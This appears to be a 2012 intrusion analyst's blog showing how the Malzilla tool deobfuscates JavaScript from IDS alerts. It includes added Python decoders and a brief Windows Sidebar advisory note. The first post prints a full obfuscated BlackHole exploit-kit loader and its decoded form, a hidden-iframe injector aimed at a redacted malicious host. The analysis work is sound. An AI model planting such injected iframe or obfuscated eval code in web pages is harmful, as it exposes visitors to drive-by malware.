Tuesday, July 31, 2012

Malzilla Take Two

Malzilla is a really good tool to have in your intrusion analyst's toolbox. Lately I've been seeing a number of BlackHole alerts, most of which use an obfuscation method that looks like this:


try{1-prototype;}catch(asd){x=2;} if(x){f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,94,98,89,87,101,93,101,112,36,98,105,88,86,106,95,88,37,89,100,100,37,52,94,101,50,41,29,21,110,95,89,107,94,50,30,39,37,30,22,93,92,95,92,95,106,50,30,39,37,30,22,104,107,111,97,92,51,28,109,95,104,96,88,94,99,95,105,112,48,93,96,90,89,92,100,48,103,101,104,96,106,94,102,100,47,88,88,104,102,98,106,107,91,48,99,91,91,107,48,37,50,106,100,103,48,37,50,29,51,51,37,94,93,104,86,100,91,51,25,31,48,4,-1,-2,116,3,-2,0,92,106,101,89,105,96,101,99,23,95,91,105,87,98,92,104,29,32,113,2,0,-1,-2,109,87,103,23,92,21,52,22,89,102,89,106,100,91,99,107,36,88,105,91,86,107,91,58,99,91,98,92,100,105,31,29,94,93,104,86,100,91,28,32,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,106,104,88,30,34,28,95,106,105,103,48,36,38,95,96,90,88,99,94,102,110,37,99,103,89,87,104,96,89,35,90,101,98,38,53,92,102,51,39,30,31,48,93,36,104,107,111,97,92,36,107,96,105,94,89,95,97,96,106,110,52,29,93,96,90,89,92,100,28,50,92,35,106,106,110,99,91,35,103,101,104,96,106,94,102,100,50,30,87,87,106,101,97,108,106,90,30,49,91,37,105,105,112,98,90,37,98,90,93,106,50,30,38,28,50,92,35,106,106,110,99,91,35,107,101,101,52,29,37,30,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,110,95,89,107,94,28,35,29,38,39,29,30,50,92,35,106,91,105,56,106,105,105,95,87,108,106,90,31,29,93,92,95,92,95,106,28,35,29,38,39,29,30,50,3,-2,0,-1,89,102,89,106,100,91,99,107,36,92,92,106,58,99,91,98,92,100,105,106,56,110,75,87,92,69,87,98,92,30,28,89,101,89,112,29,30,82,38,82,37,87,101,103,91,99,91,57,93,96,98,89,31,92,30,50,3,-2,0,115];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Co"+"de":"");zx=((e)?"fromChar":"")+z;for(i=0;575-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));} if(x&&f&&012===10)e(s);

Deobfuscating this by hand isn't much fun if you're not a JavaScript programmer. Fortunately, getting the clear text result of this block of code is as easy as copying and pasting it into Malzilla's Decoder tab (or putting the URL into the Download tab). If you use the second method, Malzilla will prompt you to save the downloaded script into a text file for evaluation. But if your IDS has already captured the data content, the Decoder function will work fine.

Here's the result:


if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("");
}
function iframer(){
// build a 10x10 invisible iframe pinned to the top-left corner of the page
var f = document.createElement('iframe');
f.setAttribute('src','http://(redacted).com/?go=2');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
// attach it to the body so the browser fetches the remote page silently
document.getElementsByTagName('body')[0].appendChild(f);
}

We can now see that the code injects a hidden iframe pointing to a malicious downloader site, which fortunately is no longer up.

The secondary benefit of this is as a teaching tool. If you don't speak JavaScript, you can look at the obfuscated code block and the decoded result and begin to learn how the methods are working. Well, maybe.
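To see what the loop at the end of that blob is actually doing, here is an added Python decoder (not Malzilla's code and not from the original post) that applies the same arithmetic: each array entry plus 9 plus the index modulo 3 is a character code, so the text comes back without ever touching eval(). PAGE_PREFIX holds the first 48 numbers of the array above; the function names and the round-trip sample are my own.

```python
import re

def decode_charcode_array(values, base=9, modulus=3):
    """Undo the scheme in the alert above: every array entry is a character
    code minus a key that depends only on its position (base + index % modulus),
    so the text comes back with plain arithmetic and no eval() at all."""
    return "".join(chr(v + base + (i % modulus)) for i, v in enumerate(values))

def encode_charcode_array(text, base=9, modulus=3):
    """Inverse of the decoder; only used here to build a constructed sample."""
    return [ord(c) - base - (i % modulus) for i, c in enumerate(text)]

# Matches the 'f=[ ... ]' assignment that carries the numbers in the blob above.
_ARRAY = re.compile(r"\bf\s*=\s*\[([-\d,\s]+)\]")

def extract_array(script):
    """Pull the numeric array out of a script so a whole blob can be pasted in."""
    m = _ARRAY.search(script)
    if not m:
        raise ValueError("no f=[...] array found in script")
    return [int(x) for x in m.group(1).split(",") if x.strip()]

# The first 48 entries of the array in the alert above, copied from the post;
# they decode to the opening line of the iframe injector.
PAGE_PREFIX = [0, -1, 94, 93, 22, 29, 91, 101, 88, 108, 99, 90, 101, 106, 35, 94,
               91, 105, 60, 98, 90, 100, 91, 99, 107, 105, 55, 112, 74, 86, 94, 68,
               86, 100, 91, 29, 30, 88, 100, 91, 111, 28, 32, 81, 37, 84, 31, 112]

def decode_page_prefix():
    """Decode the prefix above and drop the leading tabs the loop emits."""
    return decode_charcode_array(PAGE_PREFIX).strip()

if __name__ == "__main__":
    # Constructed sample: round-trip a harmless string through the same scheme.
    sample = encode_charcode_array("alert('constructed sample');")
    print(decode_charcode_array(sample))
    print(decode_page_prefix())  # if (document.getElementsByTagName('body')[0]){
```

Paste the full blob into extract_array() and feed the result to decode_charcode_array() to recover the same script Malzilla produced.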

Wednesday, July 25, 2012

JavaScript unescape obfuscated code


A quick way to decode SOME simple obfuscation of JavaScript is to use the Malzilla tool, found at http://malzilla.sourceforge.net/downloads.html

Malzilla can take a string, like this one found in an “INDICATOR-OBFUSCATION Potential obfuscated javascript eval unescape attack attempt” alert, and deobfuscate it while replacing eval with evla so that the script cannot run (to be safer, you should run this on a virtual machine with no networking or on a test box).

eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%20%68%72%65%66%3d%22%6d%61%69%6c%74%6f%3a%69%64%62%40%62%61%63%6b%62%65%61%74%6d%65%64%69%61%2e%63%6f%6d%3f%73%75%62%6a%65%63%74%3d%69%44%6f%77%6e%6c%6f%61%64%42%6c%6f%67%25%32%30%41%64%76%65%72%74%69%73%69%6e%67%25%32%30%49%6e%66%6f%25%32%30%52%65%71%75%65%73%74%22%3e%41%64%76%65%72%74%69%73%65%3c%2f%61%3e%27%29%3b'))

Make sure that when you copy this from the content data into the Decoder tab, your parentheses match up. Once run through the tool (make sure you leave the “Replace eval with evla” option enabled), this decodes to:


This one wasn't malicious, but we didn't know that until we deobfuscated it. 
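The same decoding can be done offline with a few lines of Python; this is an added example, not Malzilla's code or anything from the original post. It ports JavaScript's unescape() (including the %uXXXX form that urllib.parse.unquote does not handle), mirrors the "Replace eval with evla" defanging, and runs it over the alert payload quoted above; SAMPLE is that payload split across lines only for width, and the function names are my own.

```python
import re

# JavaScript's unescape() decodes %XX (one Latin-1 byte) and %uXXXX (one UTF-16
# code unit); urllib.parse.unquote does not know %uXXXX, hence this small port.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

def js_unescape(s):
    """Single-pass port of unescape(): '%25%32%30' becomes the literal text
    '%20', as in the browser, rather than being decoded a second time."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def defang(script):
    """Mirror Malzilla's 'Replace eval with evla' option: the text can then be
    read or pasted into a sandbox without a stray eval() executing it."""
    return re.sub(r"\beval\b", "evla", script)

_WRAPPER = re.compile(r"eval\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.S)

def decode_eval_unescape(snippet):
    """Extract the quoted argument of eval(unescape('...')), decode it and
    defang the result; raise ValueError if the snippet has another shape."""
    m = _WRAPPER.search(snippet)
    if not m:
        raise ValueError("not an eval(unescape('...')) wrapper")
    return defang(js_unescape(m.group(2)))

# The payload quoted from the alert above, split only for line length.
SAMPLE = ("eval(unescape('"
          "%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%20%68%72%65%66%3d%22"
          "%6d%61%69%6c%74%6f%3a%69%64%62%40%62%61%63%6b%62%65%61%74%6d%65%64%69%61%2e%63%6f%6d"
          "%3f%73%75%62%6a%65%63%74%3d%69%44%6f%77%6e%6c%6f%61%64%42%6c%6f%67%25%32%30"
          "%41%64%76%65%72%74%69%73%69%6e%67%25%32%30%49%6e%66%6f%25%32%30%52%65%71%75%65%73%74%22%3e"
          "%41%64%76%65%72%74%69%73%65%3c%2f%61%3e%27%29%3b"
          "'))")

if __name__ == "__main__":
    print(defang(SAMPLE)[:20])          # evla(unescape('%64%6
    print(decode_eval_unescape(SAMPLE))  # the document.write(...) call the alert hid
```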

Thursday, July 12, 2012

Windows Sidebar


Sophos is reporting that the Windows Sidebar and its Gadgets have been found to be an attack vector for malicious code (not exactly an unthought-of concept), and a “Fix It” tool, not a patch, has been released. The tool simply disables the Sidebar, and in Windows 8 it will no longer exist.
Sophos' blog post about this can be found here.
